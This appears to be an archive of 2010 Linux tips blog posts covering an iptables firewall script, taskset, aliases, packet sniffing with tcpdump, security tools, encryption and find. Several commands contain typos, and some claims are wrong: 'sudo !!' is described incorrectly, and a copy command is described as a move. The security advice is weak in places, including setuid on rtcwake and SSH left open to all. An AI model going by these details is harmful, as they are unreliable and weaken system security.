Torrents link:
Torrent (Fuduntu 32 bit): Linux Tracker
Torrent (Fuduntu 64 bit): Linux Tracker

Enhance Linuxbox Security : Basic Iptables Firewall Configuration

2010-12-25T19:07:00.002+05:30

If you are not familiar with Iptables, read this posts first.
http://linux-techy.blogspot.com/2010/04/enhance-linux-box-security-iptables.html
http://linux-techy.blogspot.com/2010/04/enhance-linux-box-security-iptables_30.html
http://linux-techy.blogspot.com/2010/06/enhance-linux-box-security-iptables.html
http://linux-techy.blogspot.com/2010/06/enhance-linux-box-security-iptables_27.html
http://linux-techy.blogspot.com/2010/06/enhance-linux-box-security-iptables_2179.html
http://linux-techy.blogspot.com/2010/12/enhance-linuxbox-security-know-all.html
In this post, I have tried to build a simple & basic iptables firewall for filtering the outside traffic. I’m going to create a simple shell script which is independent to the topology of network. Later on we will add complexity to the file as per the need & topology.
It should be executed on startup. Create a file named firewall.sh

#!/bin/bash
# please verify if the Source Address Verifcation in /etc/sysctl.conf is enabled: 
#net.ipv4.conf.all.rp_flter = 1
# Define some variables
# Location of the binaries
IPTABLES="/sbin/iptables"
# Loopback Interface
LOOPBACK="lo" 
# Flush all rules
$IPTABLES -F
# Set default policies
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD DROP
# Allow access to the Loopback host, so that you can ping yourself
$IPTABLES -A INPUT -i $LOOPBACK -j ACCEPT
$IPTABLES -A OUTPUT -o $LOOPBACK -j ACCEPT
# Incoming external traffic rules 
# Accept ICMP echo-replay incoming traffic for outgoing PINGs, so that when you 
# ping other pc your pc don't drop the echo-reply & you can detect alive coms.   
$IPTABLES -A INPUT  -p icmp --icmp-type echo-reply -j ACCEPT
#Accepting communication at specific ports. Use command netstat --inet -pln . 
# If firefox is running on #8008
$IPTABLES -A INPUT -p tcp --dport  8008 -j ACCEPT
#For allowing ssh to whole world, can create security problem
# always allow to a particular ip. 
$IPTABLES -A INPUT -p tcp --dport  22 -j ACCEPT
 # Accept all established incoming traffic
$IPTABLES -A INPUT  -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT
# Log all dropped incoming traffic
# iptables -A INPUT -j LOG -log-prefix="myLogInput:"

The sequence of rules defines the way in which they are executed. Therefore the sequencing the rules in a correct way is important.
If you want to display all the blocked packets from the INPUT chain, type the following command:

# cat /var/log/syslog | grep "myLogInput:"

Finally, you can save the firewall configuration with the following command:

# iptables-save > /etc/sysconfg/iptables

And then you can make your firewall configuration bootable with the following command:

# chkconfg iptables on

We will further append new rules at the end of this file as per our need & condition. We will discuss those in upcoming posts.

Prioritize processes using Taskset

2010-12-23T17:11:00.000+05:30

Almost every system has multiprocessors nowadays. You may require to run a process using 1 CPU or multiple CPUs. This functionality can be used by installing taskset.
Let's say you want to run firefox using one CPU. You'd run something like this:

taskset 0x00000001 firefox

For allowing firefox to use 2 CPUs replace 0x00000001 with 0x00000003

For allowing firefox to use all CPUs replace 0x00000001 with 0xFFFFFFFF

Taskset is really helpful when you want to put a limit on less important process, so that your important processes don't hang up while working
Command Format:
taskset -p [mask] [pid]
Options
-p, --pid
    operate on an existing PID and not launch a new task
-c, --cpu-list
    specifiy a numerical list of processors instead of a bitmask. The list may contain multiple items, separated by comma, and ranges. For example, 0,5,7,9-11.
-h, --help
    display usage information and exit
-V, --version
    output version information and exit
Mask: specifies CPUs assigned. values: 0x00000001, 0x00000003, 0xFFFFFFFF

You can also retrieve the CPU affinity of an existing task:: taskset -p [pid]

References:
http://linux.die.net/man/1/taskset
http://www.serverwatch.com/tutorials/article.php/3915931/Using-Taskset-for-Priority-Tasks.htm

Working With Alias

2010-12-19T17:54:00.000+05:30

In Linux, we are provided with a cool tool that can create new shortened command for a given command. It is called alias. That is, it allows a user to create simple names or abbreviations (even consisting of just a single character) for commands regardless of how complex the original commands are and then use them in the same way that ordinary commands are used. The alias command is built into a number of shells including ash, bash (the default shell on most Linux systems), csh and ksh.To create alias type the command:

#alias

Eg.#alias dir="ls"

When we create the alias, the original command will still work.

Simply typing alias will list all the created aliases. To remove alias type:

unalias dir

To remove all aliases type:

unalias -a

Using the command alias will create alias for only current session & current user. Once you log off, all your aliases will be reset.

To create permanent aliases, you have to append the file .bashrc in the user directory (for root -> /root/.bashrc ; for other users -> /home/user/.bashrc). System-wide aliases can be put in the /etc/bashrc file. The system needs to be restarted before system-wide aliases can take effect.
Go to the directory of user & type 'ls -a' to see hidden files. Note that file name starting with (.) are hidden in Linux.
Open the file in vi/gedit & type the new lines at the end of file like this:

alias internet='sudo ifconfig' 
alias p='pwd' 
alias install='sudo apt-get -y install' 
alias remove='sudo apt-get -y remove'

Likewise, you can add some more aliases.

Other Advanced Linux Bootloaders.

2010-12-18T08:32:00.001+05:30

In most Linux system GRUB (Grand Unified Bootloader) or GRUB 2 is the default bootloader. If you have more than one OS installed in your hardware, then you have to stare for few seconds on the bootloader everytime, you power on. There are other options which will help you getting ride of such monotonicity. If your system has GRUB by default (Fedora & OpenSUSE), you can upgrade it to GRUB 2 which has more features. There is also a derivative of GRUB called Burg (GRUB, letters written in reverse stands for Brand-new Universal loader from GRUB ). Let's see the features of both bootloader separately:

GRUB 2
It provides themable options. Both Ubuntu and Debian use GRUB 2 by default, so if you use either of those distros you can jump right to the theming section. In case of Fedora you can directly switch to GRUB 2 by installation but in OpenSUSE, you have to compiled by source.
Features:

The format consists of a text file that lists fonts, colors, and bitmap components, and defines their onscreen layout.
Themable elements include the background image, progress bars, and "styled boxes", you can specify images for each corner, the left, right, top, and bottom sides, and the space in the middle.
List of bootable kernels can be altered about how it is rendered, but you can't rearrange it entirely.
Can use HTML/SVG colors/comma-separated RGB triples/ PFF2 bitmap fonts.

GRUB 2 stores configuration files in /etc/grub.d/; the theming commands moved to the 00_header file. Of course, you'll probably want to browse some pre-tested themes before you create a custom one all on your own. Bennett's site has a few examples; for additional collections your best bet is to check the openDesktop sites, gnome-look.org and kde-look.org.
If you intend to do some customizing, start by simply changing the splash screen image. Move on to defining your own theme later. There is a complete guide to GRUB 2's theme format.
Burg

Burg expands on GRUB 2's theming in a number of respects but it's in experimental phase, that's why major distros don't use it.

Ability to hide text and present an "icon only" boot menu.
Switch between text and graphical modes, play sounds.
Ability to preview a theme without rebooting the system, run sudo burg-emu from a terminal.

To install Burg all you need to do is add the PPA as an Apt repository, and select the Burg package. There are also instructions for compiling the Burg source code useful for other distributions — as with GRUB 2, it is a straightforward process with no unusual dependencies. .
Burg's main configuration file is /boot/burg/burg.cfg. Check here for configuring its variables.
You specify the Burg theme to use, by name, with GRUB_THEME=themename. Themes are stored in the directory /boot/burg/themes/. For your own theme customization read this documentation.
The downloads page has a "burg-theme" package available.

Gnacktrack = [Gnome + BackTrack]

2010-12-17T16:41:00.000+05:30

There is a new penetration testing Live CD in the market. It's called GnackTrack, made solely for the Gnome lovers. GnacktrackR3 is based on Ubuntu 10.10. There are other penetration testing Live CD like BackTrack, DVL etc. BackTrack is the most well known name with in penetration testing community. Gnacktrack sounds like Backtrack but it's based on Gnome.
The story goes like this (quote from faq),

Many of us have heard of BackTrack but just struggle to get on with KDE. Many people prefer Gnome based linux distributions and thus GnackTrack was born. Originally GnackTrack was created by adding Gnome on top of BackTrack and stripping the KDE parts but this proved to be extremely painful OUCH!!! There was a lot of "junk" left over so it was decided to build a gnome based penetration cd from the ground up.
With Ubuntu being one of the most popular distributions it made sense to base GnackTrack on that, especially because the 10.04LTS had a long support life.
What to call it???? Well, being as we wanted to base this on BackTrack it made sense to call it GnackTrack. It's just stuck. This distro also uses the BackTrack repo's so it's only fair to pay respect to the RemoteExploit guys for all they're hard work.

So GnackTrack uses Backtrack repository, that a great news for Gnome users because Backtrack has a great list of amazing tools. The OS is just in incipient stage & lacks some basic features. Most bugs are fixed in this new release.The live cd is also present in VMware format for download.

Download links:
Live CD | Vmware Image

Vinux : Linux For Visually impaired

2010-12-16T20:32:00.001+05:30

Vinux 3.1 is has been launched which is a linux based on Ubuntu 10.10 meant for visually impaired users. It’s available in CD & DVD (USB & virtual version is yet to come) in both 32 bit & 64 bit version. Vinux has it’s own package repository, users can install packages using apt-get/synaptic & dedicated IRC channel. Beginner can press (Ctrl+Alt+Q) to access Quick Start Guide.

Some of the feature are:

Autokey-GTK which can insert text automatically as you type based on pre-defined abbreviations
the Parcellite Clipboard Manager which allows you paste text from the clipboard history
X-Tile which allows you to tile windows automatically
Gnome Media Player as an accessible front-end to VLC
Conkeror a keyboard controlled Web Browser
Pidgin the Internet Messenger (with all the plugins)
Gufw a simple but effective Firewall Manager.
Alarm Clock, a simple GUI for setting timed notifications,
GtkHash an md5sum calculator,
SearchMonkey an advanced search tool,
Terminator which allows you to open multiple tiled terminals in one window,
Tux Commander a dual-paned file manager with keyboard shortcuts,
World Clock which allows you to monitor times in different locations around the world,
Gcolor2 a simple GUI for selecting colours from anywhere on the screen,
the Specimen Font Previewer,
Dlume a simple address book manager,
the ToDo List package,
mhWaveEdit a simple sound recorder/editor GUI, Sound Juicer an audio CD ripper,
FSlint a file system cleaner,
Gtk-ChTheme a GTK theme previewer/changer,
Scheduled Tasks a simple GUI front-end for cron and HardInfo a system profiler
system benchmarker.

There are also three new packages unique to Vinux available from the Vinux repository. These are: Markup-Binder - makes the creation of complex navigable documents a simple process,

Speedy-OCR - is a simple GUI front end which allows you to scan in documents and convert then to text and/or speech.

Monitor-Toggle – allows you to turn off your monitor to save battery power and maintain your privacy

Reference:

http://vinux-development.blogspot.com/

http://distrowatch.com/?newsid=06398

Download link:

32bit http://vinux.archive-host.com/Vinux-31-X86-DVD.iso

64bit http://vinux.green-oval.net/Vinux-3.1-X64-DVD.iso

Powertop : [Top + Power Management]

2010-12-15T20:12:00.000+05:30

Powertop is a utility software that lists processes which are eating away your battery power & suggests you power saving useful tips. The utility in mainly meant for laptops where power consumption is critical issue. Powertop is the project of lesswatts.org. You can check this link for the processes which usually consume more power.

Quoting from lesswatts.org

As of Linux kernel version 2.6.21, the kernel no longer has a fixed 1000Hz timer tick. This will (in theory) give a huge power savings because the CPU stays in low power mode for longer periods of time during system idle. PowerTOP combines various sources of information from the kernel into one convenient screen so that you can see how well your system is doing, and which components are the biggest problem.

As stated in lesswatts.org site, PowerTOP has these four basic goals:

Show how well your system is using the various hardware power-saving features
Show you the culprit software components that are preventing optimal usage of your hardware power savings
Help Linux developers test their application and achieve optimal behavior
Provide you with tuning suggestions to achieve low power consumption

PowerTop covers all major linux distros, run PowerTop by typing powertop. It will show you ACPI estimate of power consumption & lists you suggestions if some process is unnecessarily wasting power.

Requirements:
32 bit :kernel 2.6.21 or later
64 bit :expected in kernel 2.6.23

Before installing have a look at the faq of powertop.
Download link.

References:
http://www.lesswatts.org/projects/powertop/
http://www.serverwatch.com/tutorials/article.php/3916986/Using-Powertop-to-Lower-System-Power-Usage.htm

Enhance Linuxbox Security : Know all services listening on some ports.

2010-12-14T21:30:00.001+05:30

There is a inbuilt tool used in Linux that can be used to list the services listening on some ports of your system. This is important because of the following reasons:

Any malware or spyware compromising your security can be noticed & traced.
Check on the (unencrypted) packets which can be easily sniffed in open (wifi) network.

Netstat is the tool. Execute the command to list the services which are listening to some ports.

$netstat -nap

Alternative tool is lsof utility which allows you to have the list of active ports used by processes and other useful information. Use apt-get to install it.

$ lsof -i

If you want to know more about active connections on your PC, in order for example to monitor the data flow passing through it , you can use a really useful tool embedded in Linux operating
systems which is called TCPdump.
TCPdump allows you to analyze the entire flow of data packets in transit to and from your PC, with a high level of details (headers and plaintext data). It is a great tool to fine-tune the firewall rules.
To list all tcp packets captured by your network interface eth0.

# tcpdump -n -i eth0

-n used for displaying ip address & port, -i used for specifying the network interface.

Everything passing through your network interfaces can be sniffed, and to demonstrate the absolute lack of confidentiality in a TCP packet, try to open a msn/yahoo session and sniff all of your packets with the command:

# tcpdump -Xx -s 500 -n -i eth0

This lets you see the first 500 characters of a plaintext TCP packet. Everyone over your network could possibly read your confidential messages just using their network inter faces in monitor mode.

References:
http://hakin9.org

Linux Amazing Keypresses & Commands : Set 5

2010-12-13T09:47:00.002+05:30

Finding the top 20 processing in consuming the RAM.

$ps aux | awk '{print $2, $4, $11}' | sort -k2rn | head -n 20

This command will list the top 20 process in decreasing order of their RAM consumption. It will be more helpful if you add a alias this command. Another solution for it is htop.
Install htop. For Fedora/RedHat users.

$yum install htop

For Ubuntu users.

$sudo apt-get install htop

For sorting the processes run htop & type
M for RAM
P for CPU
T for TIME
To invert the processes type I.

Command chaining.

You can chain a number a commands so the you can fetch a burger while your linux box is busy executing them.
In order to execute a series of commands regardless of any error, we have to chain them with ';'. For example,

#cd /home/rom/; ls ; cd /home/guest/ ; ls

In order to execute them only if preceding one executed successfully, we will chain them using '&&'.

#cd test && cp -f -R * /home/ron/new && rm -f -R *

In order to execute them only if preceding one fails, we will chain them using '||'.

#cd new || mkdir new

Deleting files using their inode value. Use ls -l to list the inode value.

#find . -inum 123456 -exec rm -i {} \;

References:
http://htop.sourceforge.net/
http://bashshell.net/
http://www.linuxaria.com/

rtcwake : Wake up your system after given time.

2010-12-10T13:21:00.002+05:30

Waking up the pc is the common need of every moderate users. In that case rtcwake is a useful utility for you. Using this utility you can wake up your linux box at any given time. So, why do we need to wake up the poor soul. Because of the following reasons:

System clean-up when you are busy sleeping after exploiting the pc for a whole day.
Routine System backup when you are busy attending other emergencies.
Running a cron job like buzzing a song to wake you up.

The usage can be endless. To install this program. Execute commands below.

sudo apt-get install rtcwake
sudo chmod u+s /usr/sbin/rtcwake

An example of the rtcwake command can be

rtcwake -m mem -s 300

-m stands for mode. Use standby state mode. Valid values are standby(sleep), mem(suspend to RAM), disk(hibernation) and on (no suspend). The default is standby.
-s stands for seconds after the pc is awaken. In above example, it is 300 seconds.
You can use -t instead of -s.
Go through the man pages for all options.
For know how about setting cron jobs click the link.

Warning: Be informed, rtcwake is kernel level program & may damage your pc. It don't works on older versions of Linux. You need root permission to execute it. For more complex sleep modes, you will need a modern BIOS. This can happen to you too.

References:
http://linux.die.net/man/8/rtcwake
http://www.osnews.com/story/24111/Wake_Your_Linux_Up_From_Sleep_for_a_Cron_Job

For further tweaking visit:
http://forum.xbmc.org/showthread.php?t=76710
http://www.uluga.ubuntuforums.org/showpost.php?p=8278439&postcount=14

Encrypt files using EncFS

2010-12-08T11:14:00.002+05:30

Creating an encrypted folder using EncFS is a easy job. It's a simple utility to encrypt your files. At first you have to login as a root.
Execute >su & enter root password.

Install encfs & fuse.

$apt-get install encfs fuse-utils

Load the use module in the kernel as root

$modprobe fuse

Create to folders. Note that . is used for hidden folders. Execute 'ls -a' to see hidden files/folders

$mkdir .folder

$mkdir folder

Now we need to mount these folders with encfs.The following command will ask you some things needed to create the encrypted file system, as the password which will protect this file.By simply pressing [ENTER] to these questions (except the password ...), we will have a settings arrangement that suits most people. Otherwise,check the questions one by one, reading the man pages more ...

$encfs /home/user/.folder /home/user/folder

Now file is ready to add private data. add some files & unmount the folder by executing.

$fusermount -u /home/user/folder

After executing this command check the content of folder directory. It will be empty. If you check the content of .folder, it will be encrypted.
To read the files again you have to mount it again. execute-

$encfs /home/user/.folder /home/user/folder

Provide the password & your files will be visible again.

Reference:
http://open-help.org/tutorials/applications/encfs

Antivirus Solutions for linux-3

2010-12-05T13:01:00.002+05:30

Continued... from the previous post.

5. Kaspersky Anti-Virus for Linux Workstation is a two-part solution designed to protect workstations. The first module, the on access protection, is integrated with the operating system and checks file modified files (either new or amended files), thereby ensuring real-time protection of the system without significantly increasing server load. The second module, the on demand scanner, scans the file system, removable media devices and individual files either on schedule or on demand.

Antivirus Protection - It provides real-time protection of the system, on demand file system scanning, isolates objects for further analysis quarantine & backup storage.

Easy Administration - It supports remote administration,fine tuning, notification system, reports & automatic database updating.

6. Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates. The core of the package is an anti-virus engine available in a form of shared library.

Here is a list of the main features:
    * command-line scanner
    * fast, multi-threaded daemon with support for on-access scanning
    * milter interface for sendmail
    * advanced database updater with support for scripted updates and digital signatures
    * virus scanner C library
    * on-access scanning (Linux® and FreeBSD®)
    * virus database updated multiple times per day (see home page for total number of signatures)
    * built-in support for various archive formats, including Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS and others
    * built-in support for almost all mail file formats
    * built-in support for ELF executables and Portable Executable files compressed with UPX, FSG, Petite, NsPack, wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor and others
    * built-in support for popular document formats including MS Office and MacOffice files, HTML, RTF and PDF

You can have look at more antivirus solution for linux at this link.

Antivirus Solutions for linux-2

2010-12-05T12:48:00.001+05:30

Continued.... from previous post.

3. F-Prot Antivirus for Linux Workstations is meant for home users using the Linux open-source operating system . F-PROT Antivirus for Linux Workstations utilizes the renowned F-PROT Antivirus scanning engine for primary scan but has in addition to that a system of internal heuristics devised to search for unknown viruses.
F-PROT Antivirus for Linux was especially developed to effectively eradicate viruses threatening workstations running Linux. It provides full protection against macro viruses and other forms of malicious software - including Trojans.
F-PROT for Linux Workstations features:

Scans for over 1817657 known viruses and their variants
Ability to perform scheduled scans when used with the cron utility
Scans hard drives, CD-ROMS, diskettes, network drives, directories and specific files
Scans for images of boot sector viruses, macro viruses and Trojan Horses

4. McAfee VirusScan Enterprise for Linux delivers always-on, real-time anti-virus protection for Linux environments. Its unique, Linux-based on-access scanner constantly monitors the system for potential attacks. Regular automatic updates from McAfee Labs protect your enterprise from the latest threats without requiring a system reboot.

Benefits:
Secure your enterprise with always-on protection
Protect your Linux environment with industry-leading protection:
Heuristic scanning - Uses behavior-based rules to identify and block new variants and unknown threats, without the need to download a patch.
Archive scanning - Detects and blocks viruses hidden within archived files.
Cross-platform protection - Blocks Windows malware so it's not transmitted through the Linux environment.

Continued in the next post.

Antivirus Solutions for linux

2010-12-05T08:52:00.005+05:30

It's naive to say that Linux systems are immune to viruses. Linux systems are seldom attacked by viruses because very few viruses are developed targeting Linux systems. Officially Linux desktops are now more than 1% in desktop markets shares. It's the time when people should start thinking about Linux anti-viruses. There are some free/non free solutions:
1. Avast Linux Home Edition
Avast is famous anti-virus for providing free anti-virus for windows, now they are providing free anti-virus for increasing Linux systems.
Software details:

Antivirus kernel
Automatic updates
Internationalization
User interface
Virus chest
Command-line scanner

The antivirus kernel of avast! for Linux is identical to the kernel for Windows systems.
The latest version of the avast! antivirus kernel features outstanding detection abilities, together with high performance.The Simple User Interface is used to start on-demand scanning, to work with the results and to change the various scan options.Experienced users will appreciate the classic on-demand scanner, controlled from the command line. It enables files to be scanned in specified directories and both on local and remote volumes.The Linux version also has a chest directory where suspicious files are stored.Currently, avast! for Linux is available in the following languages: English, Czech, Portuguese (Brazil), Bulgarian, Finnish, French.

2. AVG is another famous name in anti-virus market. AVG provides 5 types of linux anti-viruses.
They all have different extension: deb, rpm, sh, gz(linux) & gz(free BSD). This makes them compatible to different distros of linux ranging from Ubuntu to free BSD. It's another free anti-virus which is the demand of open source technologies. AVG supports a virus encyclopedia to keep record of viruses, also has a online forum.

Continued in the next post!

Advanced Intrusion Detection Environment (AIDE) -host based IDS for Linux

2010-12-04T19:21:00.000+05:30

Advanced Intrusion Detection Environment or AIDE is a host-based IDS & free substitute for Tripwire.
It scans the filesystem and logs the attributes of important files, directories, and devices. Each time it runs, it compares its scanned attributes against the previous, "known good" data, and alerts you if something has changes.
AIDE works by reading in the configuration file /etc/aide/aide.conf that contains
1. the attributes of each entry to log. There are currently thirteen attributes that AIDE can log — including permissions, owner, group, size, all three timestamps (atime, ctime, and mtime), plus lower-level stuff like inode, block count, number of links, and so on.
You will find these codes in the conf file.

SizeOnly = s+b
SizeAndChecksum = s+b+md5+sha1
ReallyParanoid = p+i+n+u+g+s+b+m+a+c +md5+sha1+rmd160+tiger+whirlpool

The first line activates just the size (s) and block count (b) attributes. The second adds MD5 and SHA-1 hashes, and the third logs just about every supported feature, including inode (i), timestamps (m, a, and c) and a fistful of additional hashes.
AIDE supports multiple has algorithms with which it can generate checksums for each file. By default, the list includes MD5, SHA-1, SHA-256, SHA-512, RMD-160, Tiger, HAVAL, and CRC-32. If you compile AIDE with the mhash option to the configuration script, you can also use GOST and Whirlpool hashes.

2. list of directories & files to scan
Below upper rule definitions you'll find a lines listing the directories and files to check, using regular-expression based formulas. For example:

/etc SizeAndChecksum
/sbin ReallyParanoid
/var Size
!/var/log/.*
!/var/spool/.*

The first three lines are "positive" expressions, which tell AIDE to include everything that matches the regular expression. The leading exclamation point on the last two indicate a "negative" expression, which in this case says to exclude the rapidly-changing /var/log/ and /var/spool/ directories.
Similarly you can give path to other folders which you want to be monitored like www folder.
For further experimenting the options & features, please go through the manual.
Main site:http://aide.sourceforge.net/
Download link: http://sourceforge.net/projects/aide

References:http://www.linux.com/learn/tutorials/386908:weekend-project-intrusion-detection-on-linux-with-aide
http://aide.sourceforge.net/

OSSIM: the Open Source Security Information Management System

2010-12-03T08:28:00.026+05:30

A Security Information Management system (SIM), is a toolset that fills in that gap by collecting eventlogs into a central repository for trend analysis from different tools. It centralizes log information, correlates logs to establish cause-effect relationship between events, prevents possible damage/flaws on the company’s resources etc.

OSSIM is a fully featured SIM solution that offers all the necessary functionality, ranging from the detection at low-level to high-level reporting.

Based on GNU/Linux Debian, kernel 2.6, OSSIM integrates a handy suite of security open source tools

Arpwatch, used for MAC address anomaly detection.
P0f, used for passive OS detection and OS change analysis.
Pads, used for service anomaly detection.
Nessus, used for vulnerability assessment and for cross correlation (Intrusion detection system (IDS) vs Vulnerability Scanner).
Snort, used as a Intrusion detection system (IDS), and also used for cross correlation with Nessus.
Spade, the statistical packet anomaly detection engine. Used to gain knowledge about attacks without signature.
Tcptrack, used for session data information which can grant useful information for attack correlation.
Ntop, which builds an impressive network information database for aberrant behaviour anomaly detection.
Nagios, used to monitor host and service availability information based on a host asset database.
Osiris, a Host-based intrusion detection system (HIDS).
Snare, a log collector for windows systems.
OSSEC, a host based IDS.


Screenshot from AlienVault

OSSIM also includes self developed tools, the most important being a generic correlation engine with logical directive support and logs integration with plugins.

Downloadlink:https://www.alienvault.com/opensourcesim.php?section=Downloads

References: http://en.wikipedia.org/wiki/OSSIM

Linux Amazing Keypresses & Commands : Set 4

2010-12-02T12:43:00.002+05:30

1. command

$sudo !!

After executing this command, you have to never think about typing sudo. When you type enter after typing sudo !! , user password prompt will appear & after entering password, the user don't need to enter sudo before the commands.

2. pressing [tab] twice
This is the favorite keypress used by linux users. It's useful tool for auto completion of commands. Type initial characters of a command & hit tab twice. Eg. type if & hit tab twice. shell will display all the possible commands beginning with if like 'ifconfig'.

3. pressing [Ctrl] + [R]
This will allow you to search the command history. After hitting [Ctrl] + [R], type some letters of the command you want to search.
Note It's same as executing command >history | grep

4. command

$history |tr '\011' ' ' |tr -s " "| cut -d' ' -f3 |sort |uniq -c |sort -nbr |head -n10

This command will display the top 10 used commands. What it does - it sorts all the commands in the history & arrange them as per their frequency of occurrence. If you want to display top 20 previously executed commands, replace 10 with 20.

Webcam setup in Debian Linux

2010-12-02T09:44:00.002+05:30

Setting up things in Debian systems is quite easy due to the online installation utilities like apt-get & aptitude. For setting up your webcam connect your webcam to the usb. Execute the command.

> lsusb

If the cam is supported then it will show its information. After that we have to install a cam application software. Camorama can capture stills or display images as they happen. It has no streaming capabilities.

>aptitude install camorama

At thi point your cam will start working. You can capture stills.

For more functions install cheese which is more versatile than camorama

>aptitude install cheese

You can display your cam images in mplayer.

>mplayer -fps 30 tv://

Reference : http://stray-notes.blogspot.com/2010/11/web-cam-setup-in-debian.html

PCs/Laptop with linux preinstalled.

2010-12-01T08:50:00.001+05:30

Linux is now not all all geeky stuff. People like working in Linux & praise it's powers & capabilities to handle specialized & general tasks. Dell, system76, and ZaReason offer excellent PCs and laptops with pre-installed Ubuntu.
These site provides a pre-compiled list of some pc/laptop vendors that provides linux
-> http://lxer.com/module/db/index.php?dbn=14
-> http://www.linuxhq.com/vendors/systems.html

And after that you should read these links
http://www.geeksaresexy.net/2010/11/08/why-buy-linux-pre-installed/
http://www.pcworld.com/businesscenter/article/212014/how_to_buy_a_computer_preloaded_with_ubuntu.html

Online Crontab Tool

2010-12-01T08:21:00.000+05:30

Crontab is a handy tool for scheduling particular tasks/commands. You can set a time for updating the system, shutting it down etc. So, to use the crontab, issue the command
>crontab -e
This will display the crontab file which you can edit to set your tasks.
These are the options related to crontab
crontab -e    Edit your crontab file, or create one if it doesn’t already exist.
crontab -l      Display your crontab file.
crontab -r      Remove your crontab file.
crontab -v      Display the last time you edited your crontab file. (This option is only available on a few systems.)

The syntax of the command :

< COMMAND>

Eg. 0 0 * * * halt -> means shutdown the pc at midnight everyday.
There is infact an online tool to define your crontab command if the syntax of command bugs you
--> http://www.corntab.com/pages/crontab-gui

Crontab access are restricted by the files
/usr/lib/cron/cron.allow & /usr/lib/cron/cron.deny
If your username is in the allow file you will be allowed to use crontab. If the file don't exists then you will be allowed if your name is not in the deny file. If the deny file is empty then all users all allowed. If the file doesn't exists then only root can use crontab.

Best backup tools in Linux.

2010-11-29T23:10:00.000+05:30

Data lose is one of the major fears of the users.Disk failures & accidents are the common cause of data lose which can occur at any time, so it's really important to keep track of our data regularly.
Backup tools comes with various features:
-enable you to identify important files and directories that are then constantly monitored and regularly backed up.
-perform incremental backups, which – after making a complete initial imprint of the directory – will then only make copies of new files or those that have changed since the last backup inorder to tackle redundancy.
-compress your data so you can store it more efficiently.
-tools that will encrypt your data when making copies.
-GUI and command line flavours

Some of the well known Linux Backup tools are:
Pybackpack
A vailable in most software repositories, Pybackpack is designed to be a friendly backup tool, and is notable for being easy to install manually thanks to its bundled Python installer script.
Rating: 7
Fwbackups
With Fwbackups, you can either perform on-demand backups or create sets and task Cron with automatically backing up your data. All this is conveniently offered from a slick graphical interface.
Rating: 8
Déjà Dup
Duplicity, the command line gem that offers such features as remote backups and encrypted incremental archives, is just too exhaustive to cover here. Still, we've managed to find the best graphical front-end to Duplicity around: the brilliant Déjà Dup.
Rating:9
Backerupper
Although not available in the software repositories of any big-league distributions yet, Backerupper is still popular having received extensive blogosphere coverage. The tarball contains an install.sh script if you wish to install Backerupper to disk, but it works just as well without installation. Simply double-click the backer executable file.
Rating:5
Simple Backup Suite
The Simple Backup Suite, or Sbackup, is a set of Python scripts that provide two graphical interfaces: simple-backupconfig and simple-restore-gnome. Don't panic if it isn't part of your distro's repository – with its tiny dependency list, it's easy to install, even from source.
Rating:6
Back In Time
Originally intended as a replacement for scp and the rcp tools, rsync is now often used for performing backups. There are many graphical tools that use it and Back In Time is just one.
Rating:7
LuckyBackup crams almost all the features of the tools we've covered so far into a single package, while trying to keep its interface clean and simple. Great tooltips and a comprehensive user manual help you to make sense of all that's on offer here.
Rating:7
Keep
Just like rsync, rdiff-backup is a command line utility to back up a directory to another location, even over a network. It's also similar to rsync in that it has inspired many graphical front-ends, and Keep is our weapon of choice for KDE.
Rating:8

References:
http://www.techradar.com/news/software/applications/best-linux-backup-software-8-tools-on-test-909380?artc_pg=1
*Ratings are provided by above site.

Find command demystified-2

2010-11-27T08:12:00.000+05:30

Find command can be used to copy move or delete files as we need.
>find -name "*.mp3" -exec cp {} /path/to/folder \;
This command will move all your files to a particular /path/to/folder .

Similarly you can move or delete files.
>find -name "*.mp3" -exec cp {} /path/to/USB \;
>find -name '*.mp3' -exec rm {} \;

Find files using the ownership parameter.
>find /path/to/folder -user -name “*.doc”

Direct the output of find command to a file.
>find / -name "*.mp3" > record.txt
This command will save the paths of all mp3 files in a txt file, record.txt.

Find command demystified.

2010-11-26T09:45:00.002+05:30

find command is cool tool for searching lost items. Lets find the mystery in 'find':

>find -name “abc.jpg”
is directory in which file is to be searched. Eg. '.' for present working directory. '/' for root [of course without single quotes].

In using wildcards * denotes the part of file you don't remember or you're not sure. Suppose your searching the file mission-impossible-3.mov. Some of the possible find searches could be:
>find -name "mission*"
>find -name "*mission*"
>find -name "*impossible*"
>find -name "mission*.mp3"

Now, use find commands to search for files as per their size. +100M is used for file > 100Mb,similarly -100Mb for file < 100MB. G for Gb & k for kb. find -size +100M
find -size +10G
find -size +100k
find -size -100M

Searching files with a particular extension
>find -name "*.mp3"
>find -name "*.png"

Search according to the time of previous access of the file.
>find -amin -10 -name "*.doc"
>find -mmin -10 -name "*.doc"
-10 for file access/modified in last 10 minutes. -amin/-mmin for files accessed/modified. [note -a & -m in -amin/-mmin].

More will be covered in the next post!

Linux Amazing Keypresses & Commands : Set 3

2010-08-29T00:03:00.002+05:30

1. Unmount busy drives
You are probably all too familiar with the situation - you are trying to unmount a drive, but keep getting told by your system that it's busy. But what application is tying it up? A quick one-liner will tell you:
$lsof +D /mnt/windows
This will return the command and process ID of any tasks currently accessing the /mnt/windows directory. You can then locate them, or use the kill command to finish them off.

2. su command fast execution without logging in.
$su --c [command]
It enables you to issue a command in administrative mode directly after providing the superuser password. And when the command is executed the user is logged off to the previous user.

Linux Amazing Keypresses & Commands : Set 2

2010-08-15T23:14:00.001+05:30

1. Some handy linux keyboard shortcuts!
[alt][tab] Walk through windows. To walk backwards: [alt][shift][tab]
[ctrl][tab] Walk through desktops. To walks backwards: [ctrl][shift][tab]
[ctrl][esc] Show the table of processes running on my system. Allow me to kill any of the processes I started (or send other signals to them).
[alt][f1] Access the K-menu ("Equivalent to MS Windows "Start" menu).
[alt][f12] Emulate the mouse using the arrow keys on the keyboard.
[alt][leftmousebutton] Drag a window to move it. Normally, I move a window by dragging its top title bar, but occassionally I manage to get it off the screen. With this shortcut, I can drag by any part of the window.
[alt][printscreen] Take a snapshot of the current window into the clipboard.
[ctrl][alt][printscreen] Take a snapshot of the entire desktop into the clipboard.
